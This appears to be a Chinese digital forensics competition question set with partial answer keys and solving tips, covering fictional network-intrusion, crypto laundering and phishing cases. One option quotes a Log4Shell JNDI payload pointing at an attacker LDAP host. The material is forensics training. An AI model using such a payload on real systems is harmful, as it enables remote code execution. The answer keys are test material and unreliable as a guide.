团体赛

案件详情

2022年10月，警方收到AGC集团举报表示该公司网络的电邮系统有可疑连接及流量。经过调查后，警方相信事件与本地一个IP地址有关，于是拘捕了一名男子朗尼（Rooney），并在他家中检取了一些电脑，网络装置，手机作调查。

2022年10月下旬，两名巡警在街上截查一名男子王景浩（阿浩KingHo）时，在他的背包中找到一些从网上下载的制作油漆弹教学材料，阿浩曾作出反抗但最后被制服。经调查后，警员发现阿浩计划於某日向某人投掷油漆弹，警员随后将他拘捕并于他家中检取了一批电脑，手机作调查。深入调查后发现阿浩亦与AGC集团网络被入侵事件有关。

警方的电子数据取证小组在现场作出初步了调查并对涉案装置进行了电子数据取证。请你根据警方的资料，协助将事件经过还原。

警方资料

与’朗尼’相关的资料

与’AGC’集团相关的资料

与’王景浩’相关的资料

题目部分

[单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ，它的实際安装时间是什么? (以时区UTC+8回答) (3分)

A. 2022-09-26 14:35:17

B. 2022-09-26 21:35:17

C. 2022-09-27 05:35:17

D. 2022-10-05 03:52:15

E. 2022-10-05 11:52:15

答案：A

加上8小时后才是正确的

[单选题] AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (1分)

A. 2022-09-28 19:01:40

B. 2022-09-28 07:18:33

C. 2022-08-30 19:01:40

D. 2022-08-30 07:18:33

答案：A

查注册表就可以看到了，地址：HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\AdobeAcrobat\DC\Install

[单选题] AGC-CS计算机里的用户 ‘Carson’ 链接了一个网络磁盘机 (Network Drive)，在下列哪一个档案有相关资料? (2分)

A. \Users\Carson\NTUSER.DAT

B. \Users\admin\NTUSER.DAT

C. \Windows\System32\config\SYSTEM

D. \Windows\System32\config\SOFTWARE

E. \Windows\System32\config\SECURITY

答案：A

想着一个一个去看的..结果发现看到第一个用户dat的时候就找到了..

仿真的时候打开此电脑就看到了一个网络设备，包含着IP地址

根据这个IP去找就找到了

[单选题] 承上题，用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)

A. \192.168.182.134\

B. \192.168.182.134\photo

C. \192.168.182.134\share

D. \192.168.182.134\AGC

E. \192.168.182.134\AGC photo

答案：C

根据上面的高亮就看到了是share目录

[填空题] 分析计算机里的电邮数据，当中包含嫌疑人王景浩可能的居住地址，请回答他住址的楼层 (以阿拉伯数字回答) (1分)

答案：45

在任务栏发现了Outlook，猜测用的邮件软件应该是Outlook

一拉到最低就是王景浩的邮件，里面有地址

[填空题] 承上题，王景浩使用的信用卡号码最后四位数字是? (1分)

答案：6717

跟着图片填就可以了

[填空题] AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件，那个档案的档案名是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (1分)

答案：KEFMUONDOCX

在下载的文件夹里面只看到一个word文件

[单选题] 承上题，分析该 ‘Word’ 文件，它的可能用途是? (3分)

A. 访问一个网站

B. 记录键盘操作

C. 把档案加密

D. 改变桌面壁纸

E. 关闭计算机

答案：A

尝试打开Word查看，发现文档头部就有一个链接，且根据文章分析，是讲述一个产品或者是品牌的，猜测是跳转到链接查看详情

[单选题] AGC-CS计算机里有一个名为 ‘admin’ 的用户，它是在何时被建立的? (以时区UTC+8回答) (1分)

A. 2022-09-28

B. 2022-09-29

C. 2022-09-30

D. 2022-10-01

E. 以上皆非

答案：B

可以知道，上次密码设置的日期应该为创建用户的日期

[填空题] 黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (2分)

答案：20220929204102

通过分析工具可以查看到admin登录记录

[填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件，这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)

答案：

施工中

[填空题] 承上题，黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘：’ 或 ‘-‘ ，以大写英文及阿拉伯数字回答) (3分)

答案：

施工中

[填空题] AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案，这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)

答案：

仿真后使用admin账户登录，可以看到记事本曾经打开的记录

最近打开了ip.txt，与上述对应

[单选题] 黑客除了通过 ‘RDP’ 外，还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)

A. VNC

B. Teamviewer

C. Anydesk

D. Splashtop Business Access

E. RemotePC

答案：B

分析软件里面能看到使用Teamviewer控制admin账号的记录

[填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) ‘pve’ 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)

答案：114147

参考wp：https://blog.csdn.net/WXjzcccc/article/details/128175094

通过FTK Imager挂载三块盘，再使用UFS Explorer 8.16对读取到的RAID卷进行提取并制作E01镜像

提取后，使用盘古石以文本方式打开镜像，可以看到PE Count数量为114147

同样，使用该镜像挂载并进行仿真也可以查看

[填空题] AGC_Server里LVM 的 LV(邏輯卷)”pve-data” 使用了多少百分比的空間? (不用填寫 ‘%’，以阿拉伯数字回答) (3分)

答案：2

挂载后使用df -h命令查看即可

[多选题] AGC_Server里的 ‘Proxmox’ 虚拟化环境 (Virtual Environment - VE) 有哪一个用户? (2分)

A. root

B. VM_admin

C. sysadmin

D. acl

E. tss

答案：AE

在里面找看看有没有就行

[填空题] 分析 ‘VM’ (虚拟机) 编号 ‘111’ AGC网站的网页服务器日志，当中记录了黑客曾向该服务器发出多少次與远程代码執行 (Remote Code Execution) 的网络攻击？ (以阿拉伯数字回答) (2分)

[单选题] 哪一个IP地址尝试登录’VM’ (虚拟机) 编号 ‘111’ 失败次数最多? (1分)

A. 38.242.130.207

B. 218.92.0.206

C. 43.142.93.22

D. 121.202.141.105

E. 61.238.217.108

[填空题] 黑客在入侵 ‘VM’ 编号 ‘111’ 后，打算涂改AGC公司的网页，黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答) (3分)

[多选题] 根据 ‘VM’ 编号 ‘111’ 里的网页服务器 (Web Server) 的设定，访客可从下列哪个网页地址访问这个服务器? (2分)

A. localhost

B. www.ag.com.shop

C. www.agcom.shop

D. agcom.shop

E. www.agcom.com

[填空题] 黑客曾入侵 ‘VM’ 编号 ‘111’ 里的电邮系统 ‘Xeams’，他登录的时间是? (以unix时间戳回答，格式如:1665049779010) (2分)

[单选题] 黑客在入侵后盗用AGC员工电邮户口及冒充AGC员工回复了电邮给客户，发出这封电邮的操作系统 (Operating System) 及电邮软件 (Mail Agent) 是什么? (2分)

A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0

B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1

C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1

D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1

E. Windows 10 Pro Outlook 2016

[单选题] 黑客在 ‘Proxmox’ 里留下了一个被加密了的程序(Program)，在解密后它的SHA-256哈希值 (Hash Value) 是什么? (2分)

A. C89D7A… …8C4E76

B. C7141F… …64BF65

C. E9433E… …1A5134

D. 45CE1C… …79BD4A

E. 0ACAA5… …AB7ECE

[填空题] 承上题，分析程序代码 (Program Code)，上述程序的档案名应该是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (3分)

[单选题] 于虚拟机 ‘VM’ 编号 ‘111’ 里的档案 ‘\srv\samba\share\AGCphoto\DSC01139.JPG’ ，照片中出现的街道名称是? (2分)

A. 河背街

B. 沙咀道

C. 众安街

D. 香车街

E. 川龙街

[单选题] 王景浩的计算机使用什么文件系统 (File System) ? (1分)

A. exFAT

B. APFS

C. HFS

D. HFS+

[单选题] 王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)

A. 10.4.11

B. 10.9.5

C. 10.10.5

D. 10.11.6

[填空题] 王景浩的计算机当前有多少个用户 (包括访客 ‘Guest’ )? (以阿拉伯数字回答) (1分)

[填空题] 王景浩的计算机里有一个用户被删除，被删除的用户名称是什么? (以大写英文回答) (1分)

[填空题] 王景浩的计算机有多少个 ‘聚焦’ 的搜索记録 (Spotlight Search) ? (以阿拉伯数字回答) (1分)

[单选题] 当用户设置了自动登录 (Auto Login) 后，王景浩计算机的操作系统会产生哪个档案? (2分)

A. manifest.plist

B. info.plist

C. PasswordPanel.strings

D. kcpassword

[单选题] 王景浩计算机的登录密码 (Login Password) 是什么? (2分)

A. 1qa@WS3ed

B. 3ed$RF5tg

C. 5tg^YH7uj

D. 2ws$RF6yh

[单选题] 在王景浩的计算机里，他最后使用哪个电邮地址登录 ‘iCloud’ 账号? (2分)

A. kinghoo0w0@gmail.com

B. wonghoo588@yahoo.com

C. kingho726@aol.com

D. kinghoo0w0@yahoo.com

[多选题] 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本? (2分)

A. 12.5.6

B. 15.4

C. 15.5

D. 16.0.3

[填空题] 王景浩曾经将一台 iPhone 6 连接他的计算机，请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (2分)

[单选题] 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案? (2分)

A. Info.plist

B. privacy.json

C. Manifest.plist

D. PasswordPanel.strings

[多选题] 以下哪种工具可以用作破解密码? (1分)

A. Passware

B. John The Ripper

C. HashCat

D. Password Recovery Toolkit

[多选题] 通过 ‘hashcat’ 破解 ‘iTunes Backup’ 密码需要制订一个 ‘txt’ 档案，若该备份的手机iOS版本是10以上，需要按照下列哪个提示字符 (String) 的数据去制订这个 ‘txt’ 档案? (3分)

A. WPKY

B. ITER

C. SALT

D. DPIC

E. DPSL

[填空题] 王景浩采用了4位数字加密了他的iPhone XR的备份，分析它的密码是什么? (以阿拉伯数字回答) (3分)

[填空题] 最后一次连上王景浩计算机的3D打印机的IP 地址是什么? (不要输入答案中的 ‘.’，以阿拉伯数字回答) (2分)

[填空题] 3D打印机最后一次在王景浩的计算机尝试打印的时间? (以时区UTC+8回答) (2分)

[单选题] 最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)

A. CE3_balljoint_extender.gcode

B. um3-penguin-real-mini-keychain-merged-tpu.gcode

C. CE3_Prancer.gcode

D. CE3_2020-psu-atx-mount.gcode

[单选题] 王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)

A. 百度

B. 谷歌

C. 360

D. Safari

[单选题] 分析王景浩计算机的数据，王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)

A. bc1quw… …zpzjzt

B. bc1qm… …5f7n9g

C. bc1q79… …h4sq52

D. bc1qsl… …je7hkk

[单选题] AGC公司员工 ‘Carson’ 有一个由公司发给他的电邮账户，分析王景浩的计算机数据并找出 ‘Carson’ 的电邮账户密码。 (2分)

A. AGC2020@pw

B. AGC2012@PW

C. AGC2020@hkg

D. AGC2021@PW

[填空题] 王景浩曾经冒充AGC公司员工 ‘Carson’ 发送电邮给AGC 客户，这封电邮的 ‘Message-ID’ 是什么? 回答它的首８位数值。(以大写英文和阿拉伯数字回答，如 4GEF90GD) (2分)

[多选题] 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据? (2分)

A. Teamviewer

B. OpenVPN

C. Remote Desktop Manager

D. Tor Browser

[多选题] 王景浩在AGC公司盗取了下列什么类型的档案? (2分)

A. ost

B. xlsx

C. jpg

D. docx

[填空题] 王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN)，这个VPN的IP地址是什么? (不要输入答案中的 ‘.’，以阿拉伯数字回答) (2分)

[填空题] 装置 ‘「KingHoo」的iPhone’ 的蓝牙媒体访问控制地址 (MAC Address) 是什么? (不要输入答案中的 ‘：’ 或 ‘-‘ ，以大写英文及阿拉伯数字回答) (1分)

[单选题] 王景浩何时将 ‘小宝’ 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)

A. 2022年07月14日

B. 2022年07月15日

C. 2022年07月16日

D. 2022年07月17日

E. 2022年07月18日

[单选题] 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到多少存款? (1分)

A. HKD298.8

B. HKD344.7

C. HKD396

D. HKD543

E. HKD465.1

[单选题] 王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)

A. KEF

B. EDIFIER

C. BOSE

D. YAMAHA

E. Bowers & Wilkins

[单选题] 王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机，当天试飞的地点在哪里? (2分)

A. 大埔海滨

B. 启德

C. 数码港

D. 西环

E. 将军澳

[单选题] 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久? (2分)

A. 6分58秒

B. 8分10秒

C. 9分6秒

D. 11分1秒

E. 15分33秒

[多选题] 王景浩用 iPhone XR 拍了一张照片’IMG_0012.HEIC’，那照片什么地方曾被修改? (3分)

A. 拍摄时间

B. 经纬度

C. 时区

D. 档案名称

E. 拍摄装备

[填空题] 承上题，那张照片修改后的经纬度是什么? (不要输入答案中的 ‘.’，将经纬度合并回答。如 22.2846135 114.1739116，需回答 2228461351141739116) (3分)

[单选题] 朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)

A. OpenWrt

B. admin

C. root

D. AsusRt

E. DDwrt

[多选题] 以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)

A. LAN地址是 192.168.1.24

B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务

C. WIFI登录密码为’OpenWrt’

D. 提供网络时间协议 (NTP) 服务

E. 时区设置相等于UTC+8

[多选题] 承上题，’VPN’ 服务器的IP地址及端口 (Port) 是什么? (2分)

A. IP地址 61.238.217.108

B. IP地址 192.168.8.1

C. IP地址 103.10.12.106

D. 端口 33248

E. 端口 1194

F. 端口 1701

[填空题] 朗尼草莓计算机操作系统设定了一个档案来储存系统的 ‘log_file’ ，档案名称是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (2分)

[单选题] 承上题，检视上述的档案，当中有几个IP地址曾经成功登录这个系统的 ‘VPN’ 服务? (3分)

A. 1

B. 2

C. 3

D. 4

E. 0

[单选题] 承上题，检视上述的档案，当中有几个IP地址曾经尝试以 ‘root’ 登入装置但因密码错误而不成功? (2分)

A. 2

B. 4

C. 5

D. 6

E. 8

[填空题] 根据装置的过往记录，’log_file’ 是设在 ‘usr/rooney/‘ 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)

[填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)

[单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯，记忆卡共有多少个分区 (Partition) ? (1分)

A. 1

B. 2

C. 3

D. 4

E. 0

[单选题] 检视记忆卡上硬盘分区表资讯，第二个分区的分区代码 (Partition Code) 是什么? (1分)

A. 07

B. AF

C. 0C

D. 2B

E. 01

[多选题] 记忆卡的档案不能被读取，记忆卡受损的原因包括? (2分)

A. 目录项结构 (Directory Entry) 受损

B. 启动扇区表 (Master Boot Record) 受损

C. 文件分配表 (File Allocation Table - FAT) 受损

D. 引导扇区 (Boot Sector) 受损

E. 以上各项皆是

[填空题] 承上题，通过分析及手动恢复还原，记忆卡里有多少个出錯的情况出现? (以阿拉伯数字回答) (3分)

[多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案，它的SHA-256哈希值是 ‘F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF’。该档案显示了哪些影像? (2分)

A. 人

B. 山

C. 汽车

D. 交通灯

E. 天空

[单选题] 检视记忆卡的数据，在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中，曾经出现哪一个IP地址? (2分)

A. 61.238.217.108

B. 155.137.190.123

C. 192.168.1.66

D. 185.200.100.242

E. 213.104.156.111

[填空题] 恢复还原后的记忆卡中，第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)

[填空题] 记忆卡第一个文件系统中有一个视频档，它的SHA-256哈希值是 ‘847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19’，这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么? (以阿拉伯数字回答) (2分)

[单选题] 尝试分析记忆卡数据結構受损的原因，通过合适的方法把数据恢复到原本没有出错的状况，记忆卡的SHA-256哈希值是什么？ (3分)

A. E63DF0… …8627D3

B. 3FD99E… …17B6DE

C. 3BADAA… …666A8F

D. BBB211… …E00710

E. AA9E81… …2C04FE

[单选题] 朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)

A. MetaMask

B. Electrum

C. Trezor

D. 以上皆非

[填空题] 朗尼通过比特币替王景浩清洗黑钱，分析朗尼的计算机及手机，朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)

[单选题] 朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)

A. 1%

B. 4%

C. 7%

D. 10%

E. 15%

[单选题] 朗尼的计算机里有一个没被加密的比特币钱包，它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)

A. oppose

B. area

C. twice

D. roast

[单选题] 朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)

A. 1

B. 2

C. 3

D. 4

E. 5

[单选题] 朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里，这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)

A. DMG

B. PDF

C. ASD

D. ZIP

E. PNG

[单选题] 朗尼在手机里有一个加密了的比特币钱包，他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)

A. Safepal

B. Metamask

C. Changelly

D. Opensea

[单选题] 承上题，这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)

A. 2022-10-07 10:29时

B. 2022-10-07 11:06时

C. 2022-10-07 11:07时

D. 2022-10-07 13:54时

[单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 ‘MetaMask’ ? (以时区UTC+8回答) (1分)

A. Chrome 2022-08-25 12:35时

B. Chrome 2022-10-07 14:29时

C. Firefox 2022-08-25 12:35时

D. Firefox 2022-10-07 14:29时

[单选题] 朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)

A. Ethereum

B. Polygon

C. Solana

D. Arbitrum

E. Klaytn

[单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)

A. 2022-10-07 14:47时

B. 2022-10-07 14:49时

C. 2022-10-07 14:52时

D. 2022-10-07 14:54时

[多选题] 朗尼的手机里，有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)

A. Metamask

B. Opensea

C. Safepal

D. YouTube

[单选题] 朗尼的手机里，于2022-10-07，15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)

A. 登录 ‘Metamask’

B. 登录 ‘Opensea’

C. 屏幕截图 (Screen Capture)

D. 登录 ‘YouTube’

[多选题] 承上题，从这个动作中能找到什么资讯? (1分)

A. Opensea.io

B. Ethereum Main Network

C. Your purchase is complete

D. Subtotal = 0.0253 ETH

E. Good Luck

[填空题] 在朗尼的计算机旁找到 ‘MetaMask’ 的密码是 ‘opensea741’，找出朗尼计算机里的 ‘MetaMask’ 中有多少加密货币余额? (不要输入 ‘.’，以阿拉伯数字回答，如 0.137 需回答 0137) (2分)

[填空题] 朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 ‘@’ 及 ‘.’，以大写英文及阿拉伯数字回答，如 name@mail.com，需回答 NAMEMAILCOM) (1分)

[填空题] 什么电邮账号曾接收过上述电邮地址发送的电邮？（不要输入答案中的 ‘@’ 及 ‘.’，以大写英文及阿拉伯数字回答，如 name@mail.com，需回答 NAMEMAILCOM） (1分)

[多选题]承上题，上述的电邮附件包含哪些类型的档案? (3分)

A. pdf

B. doc

C. png

D. txt

E. jpg

[填空题] 上述电邮附件里的文件，被遮蔽的英文单字是什么? (以大写英文回答) (3分)

[填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed)，计算朗尼在 ‘MetaMask’ 使用的以太币 (Ethereum) 地址。 (提示： BIP-44 derivation path = m/44’/60’/0’/0/0) (以大写英文及阿拉伯数字回答) (3分)

[单选题]在2022年9月28日18时51分 (UTC+8)，朗尼曾经在手机用WhatsApp与王景浩对话，语句 [有灯，风扇经常在转]，回复这句话的相关语句是什么? (1分)

A. 你有推介吗?

B. 我之前放在你家的机械运作正常吗?

C. 有灯号风扇有转动?

D. 帅吗?

[单选题] 朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)

A. 荃湾

B. 湾仔

C. 九龙城

D. 九龙塘

[填空题] 朗尼手机的 ‘WhatsApp’ 号码是什么? ( 号码 ) @s.whatsapp.net? (以阿拉伯数字回答) (1分)

[多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)

A. taiiphone

B. rooneyhome

C. Function Room

D. TP-Link

[单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)

A. abcd5678

B. aaaa0000

C. rooney111

D. rdfu1234

[填空题] 在朗尼手机于2022年9月30日的 ‘WhatsApp’ 对话里，有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 ‘VPN’ 的租金? (以阿拉伯数字回答) (3分)

[填空题] 就AGC集团网络的流媒体服务器 (Media Server)，有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)

[填空题] 就AGC集团网络的流媒体服务器，有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)

[填空题] 就上述的本地用户，成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)

[单选题] 试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)

A. iamhacker

B. hacking

C. hack

D. hacker

E. 以上皆非

[填空题] 就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)

[多选题] 该流媒体服务器是有使用Docker容器 (Docker Container) 的，当中包含以下哪个Docker镜像 (Docker Image) ? (3分)

A. apache2

B. ubuntu

C. centos

D. nginx

E. hello-world

F. 以上皆非

[单选题] 就上述的Docker镜像，哪一个镜像在系统上运行中? (2分)

A. apache2

B. ubuntu

C. centos

D. nginx

E. hello-world

F. 以上皆非

[多选题] 该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的，就 ‘比特币’ 标题，有以下的电子邮箱地址曾经留有评论? (2分)

A. cn.wordpress.org

B. root58462@mail.qq.com

C. hi456@163.com

D. root@163.com

E. user1@localhost.net

F. 以上皆非

[单选题] 该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)

A. https://weibo.com

B. http://www.baidu.com

C. https://www.douyin.com

D. https://youku.com

E. https://www.binance.com

F. 以上皆非

[单选题] 该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)

A. RAID 0

B. RAIDz2

C. RAIDz3

D. RAID 10

E. RAID 5

F. 以上皆非

[单选题] 该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)

A. Jun

B. Jul

C. Aug

D. Sep

E. Oct

F. 以上皆非

[填空题] 承上题，拥有该段儿童色情影片的用户名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答) (1分)

[填空题] 就AGC集团网络的流媒体服务器，曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果，该用户所输入的网址是什么? (不要输入符号，以大写英文及阿拉伯数字回答，如 https://web3.com，需回答 HTTPSWEB3COM) (2分)

[填空题] 该基本镜像存储池 (pool) 有一个快照 (Snapshot)，快照的名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答，如 media/mediapool@abc123，需回答MEDIAMEDIAPOOLABC123) (1分)

[填空题] 就上述所找到的基本镜像存储池快照 (Snapshot)，它储存了多少个档案? (以阿拉伯数字回答) (1分)

[单选题] 王景浩的USB记忆棒里有一个 ‘Data’ 文件夹 (Folder)，它存有哪一种类型的密钥文件? (1分)

A. pem

B. cer

C. crt

D. key

E. 以上皆非

[多选题] 承上题，’Data’ 文件夹里有一个被加密了的档案，它是被哪一种加密方法加密? (2分)

A. Symmetric

B. PGP

C. Twofish

D. RSA

E. Triple DES

[单选题] 尝试将档案解密，该档案属于哪一个类型 (File type)? (2分)

A. exe

B. ods

C. rtf

D. sql

E. 以上皆非

[多选题] 承上题，找出以下哪一个名字出现在该档案里? (3分)

A. Armand To

B. Adam Smasher

C. Beverly Kot

D. Huma Chan

E. 以上皆非

[单选题] 分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令，它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)

A. http://155.137.195.111:8080

B. http://www.w3.org/2003/05/soap-envelope

C. http://61.238.217.108:8000

D. 以上皆非

[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令，它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)

A. root

B. ${jndi:ldap://61.238.217.108:1389/a}

C. application/x-www-form-urlencoded

D. password

[单选题] AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后，它执行了哪些行动? (2分)

A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口

B. 于IP地址61.238.217.108下载了Exploit.class

C. 使用端口49264连接IP地址61.238.217.108发送同步要求

D. 以上皆是

[填空题] 在上述行动后，IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)

[多选题] AGC服务器10.0.66.184里有一个AGC目录 (Directory)，它的子目录 (Sub Directory) 包含以下哪一个? (2分)

A. Accounting

B. Picture

C. Staff

D. Sambashare

E. Retail

[多选题] 入侵者迸入AGC服务器10.0.66.184后，他成功执行以下哪些指令? (2分)

A. 檢视了readme.txt内容

B. 删除了三个档案

C. 删除了一个目录 (Directory)

D. 替档案改名

E. 建立了两个txt档案

[单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename)，这个档案的原来名称是什么？ (1分)

A. cGhvdG9zT0Zyb2NreQ==

B. Finanical.xls

C. readme.txt

D. anonymous

[单选题] 承上题，该档案原档的建立日期是什么? (2分)

A. 2022-10-21 08:10:30 (UTC+0)

B. 2022-10-21 16:19:39 (UTC+0)

C. 2022-10-22 08:10:30 (UTC+0)

D. 2022-10-22 14:22:06 (UTC+0)

E. 2022-10-22 16:19:39(UTC+0)

[单选题] 承上题，该档案的SHA-256哈希值是什么? (3分)

A. a6eef1… …27364c

B. 54785c… …fe86f0

C. 961f2b… …647d55

D. a00e6c… …d0eaab

E. 以上皆非

[多选题] 通过取证调查结果迸行分析 (包括但不限于以上问题及情节)，以下哪项关于王景浩的推断是正确的? (5分)

A. 曾经采用他的计算机入侵AGC集团网络

B. 传播儿童色情物品

C. 于AGC集团取得大量客户资料

D. 通过VPN取得Rooney家里的IP地址

E. 企图更改AGC集团的网页

资格赛

案件详情

于2022年10月，有市民因接获伪冒快递公司的电邮，不慎地于匪徒架设的假网站提供了个人信用咭资料导致经济损失。警方追查下发现当中一名受骗市民男子李大輝 (TaiFai) 的信用卡曾经被匪徒在区内的商舖购物。 后来警方根据IP地址，锁定及拘捕了一名男子林浚熙（阿熙 ChunHei），并于他的居所发现了一批相信曾被用作犯案的电脑及手机装置。

经调查后，警方发现阿熙除上述案件外，他亦牵涉其他的一些犯罪活动。

警方的电子数据取证小组在现场作出初步了调查并对涉案装置进行了电子数据取证。请你根据得到的资料，协助将事件经过还原。

警方资料

与’林浚熙’相关的资料

与受害人’李大辉’相关的资料

与女友’王晓琳’相关的资料

个人赛部分共70题

题目部分

[填空题] 王晓琳手机的‘IMEI’号是什么?(以阿拉伯数字回答)(1分)

352978115584444

[多选题] 王晓琳的手机安装了什么即时通讯软件(lnstant Messaging Apps)?(1分)

A. Signal

B. 微信(WeChat)

C. QQ

D. WhatsApp

E. LINE

答案：ABD

一个一个搜搜关键词就可以出结果了

[单选题] 王晓琳于什么日子和时间曾经通过即时通讯软件发出一个 PDF档案?(以时区UTC+8回答)(1分)

A.2022-09-30 17:39:53

B.2022-10-01 17:39:53

C.2022-09-30 18:30:28

D.2022-10-01 16:30:22

答案：A

定位到聊天记录

[填空题] 承上题，这个 PDF 档案的MD5哈希值Hash Value) 是什么?(以大写英文及阿拉伯数字回答)(1分)

答案：ae0d6735bbe45b0b8f1ab7838623d9c8

导出自己计算即可

[单选题] 王晓琳将这个“PDF 档案发给哪一个用户,而该用户的手机号码是什么?(1分)

A.85297663607

B.85259308538

C.85269707307

D.85246427813

答案：B

根据第三题可以知道结果

[多选题] 王晓琳发出这个PDF 档案的原因是什么?(1分)

A. 寻求协助

